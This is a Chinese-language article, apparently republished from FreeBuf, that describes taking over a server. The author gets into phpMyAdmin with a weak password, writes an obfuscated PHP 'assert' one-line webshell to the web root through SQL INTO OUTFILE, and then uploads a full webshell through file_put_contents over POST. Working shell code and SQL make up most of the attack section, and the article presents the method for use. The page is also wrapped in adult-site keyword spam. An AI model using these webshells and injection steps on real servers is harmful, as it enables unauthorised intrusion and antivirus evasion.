成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

解讀木馬GetShell的另類姿勢

安全 黑客攻防
其實吧,之前是想寫一長篇小說的,把整個過程詳細的寫一遍,怕各位看官拍磚,轉了話風 ……

0×00 工欲善其事,必先利其器

其實吧,之前是想寫一長篇小說的,把整個過程詳細的寫一遍,怕各位看官拍磚,轉了話風 ……

[[150544]]

中間件:

XAMPP(能運行PHP程序即可)

‍‍武器:

Chrome瀏覽器、Proxy SwitchySharp代理插件、Advanced REST client插件(核武器)

‍‍函數:

file_put_contents()、urlencode()、urldecode()、php_strip_whitespace() -- PHP函數

0×01 上小馬

掃C段時發現一機器有phpMyAdmin服務,就嘗試了一下弱口令,root123果斷進入,然后就開始了下面的故事。

探測IP為阿里云服務器,普通的一句話木馬一寫入就被殺掉,后改為混淆一句話木馬:

  1. <?php                  
  2. @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r';                    
  3. @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t';                    
  4. @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'}                    
  5. [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);  
  6. //密碼-7    
  7. ?> 

一句話木馬原形:

  1. assert($_POST[-7]); 

寫入一句話木馬SQL(網站路徑從phpinfo.php獲得,其它姿勢亦可):

  1. use test;  
  2. drop table if exists temp;  
  3. create table temp (cmd text NOT NULL);  
  4. insert into temp (cmd) values("<?php @$_='s'.'s'./*-/*-*/'e'./*-/*-*/'r'; @$_=/*-/*-*/'a'./*-/*-*/$_./*-/*-*/'t'; @$_/*-/*-*/($/*-/*-*/{'_P'./*-/*-*/'OS'./*-/*-*/'T'} [/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?> ");  
  5. select cmd from temp into outfile 'D:/phpStudy/WWW/phpMyAdmin/indxe.php';  
  6. drop table if exists temp; 

木馬GetShell的另類姿勢

 

0×02 處理大馬

解讀木馬GetShell的另類姿勢

 

用菜刀連接一句話木馬,連接上后即提示"連接被重置",估計是屏蔽了本機的出口IP,用VPN、切換代理后同樣的問題還是會即時出現,所以放棄用菜刀上傳webshell,嘗試手工post的方法。

這里需要先確定下服務器上file_put_contents()函數是否執行,可行的話再執行下面的操作。

首先在本地把大馬處理好以便于作為post參數:

用到了strip_whitespace()函數【返回已刪除PHP注釋以及空白字符的源代碼文件】,urlencode()函數【對字符串進行url編碼處理】,file_get_contents()函數【讀取txt文件內容】。

C盤根目錄下需要放一個strip_shell.php文件(待strip_whitespace的php大馬),新建strip.php文件和urlencode.php文件,兩文件內容分別為(注意兩個函數參數):

  1. strip.php:  
  2. <?php  
  3. echo php_strip_whitespace('strip_shell.php');  
  4. ?>  
  5. urlencode.php:  
  6. <?php  
  7. echo urlencode(file_get_contents('urlencode_shell.php'));  
  8. ?> 

執行過程如下(注意文件名稱變化和執行順序):

解讀木馬GetShell的另類姿勢

 

所有文件如下:

解讀木馬GetShell的另類姿勢

 

其中urldecode.php文件為最終處理的文件,文件內容如下:

解讀木馬GetShell的另類姿勢

 

0×03 GetShell

最后請出主角Advanced REST client插件,長這樣:

解讀木馬GetShell的另類姿勢

 

這里只需用到POST方法,上面一句話小馬的密碼為-7,即這里Payload模塊的key為-7,參數重要部分如下:

  1. file_put_contents("D:/phpStudy/WWW/phpMyAdmin/mysqlx.php",urldecode("復制urldecode.php文件所有內容")); 

最后POST表單如下:

解讀木馬GetShell的另類姿勢

 

至此,成功GetShell,有錯誤或好的建議請指正提出。

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2010-06-28 14:30:08

SQL Server

2010-07-12 15:36:45

SQL Server

2012-11-20 09:49:33

Windows 8操作系統

2013-07-16 14:48:03

大數據大數據技術數據

2019-07-19 10:44:34

移動應用APP

2011-05-11 11:10:10

網游病毒營銷病毒

2017-07-06 09:33:18

AMDEPYC處理器

2015-03-13 09:30:23

iOS內存管理

2010-11-23 11:16:35

MySQL表別名

2009-10-23 17:10:27

試用達人

2020-03-10 18:53:16

移動支付另類支付APP

2011-04-25 13:13:02

Javafinalize

2012-06-15 17:50:26

2013-08-22 17:42:59

2009-03-09 13:59:22

IDC行業

2009-09-09 16:06:08

對象

2014-09-25 09:00:57

2010-09-14 09:28:34

2018-09-21 10:45:54

2018-01-11 15:31:39

命令Linux關機
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: av在线天堂网 | 美女视频黄色的 | 亚洲成人av一区二区 | 久久国产精品色av免费观看 | 欧美日韩在线播放 | 狠狠色综合网站久久久久久久 | 精品国模一区二区三区欧美 | 在线激情视频 | 成人免费网站视频 | 青青久草 | 久久久99精品免费观看 | 日韩欧美一区二区在线播放 | 丝袜美腿一区二区三区 | 91国内视频在线 | 色在线免费视频 | 国产成人99久久亚洲综合精品 | 国产成人麻豆免费观看 | 午夜欧美一区二区三区在线播放 | av一级在线观看 | 国产99久久久国产精品 | 97精品超碰一区二区三区 | 免费国产成人av | 日韩综合网 | 久久久国产精品视频 | 午夜精品一区二区三区在线观看 | 欧美a区| 91久久久久久久久久久 | 中文字幕av一区二区三区 | 国产91网站在线观看 | xnxx 日本免费| 久久大 | 精品欧美一区二区三区久久久 | 午夜日韩精品 | 精品一区二区三区免费视频 | 91免费观看视频 | 97伦理电影网 | 在线观看国产精品一区二区 | 亚洲欧美日韩国产综合 | 丁香一区二区 | 国产精品亚洲精品久久 | 国产成人精品网站 |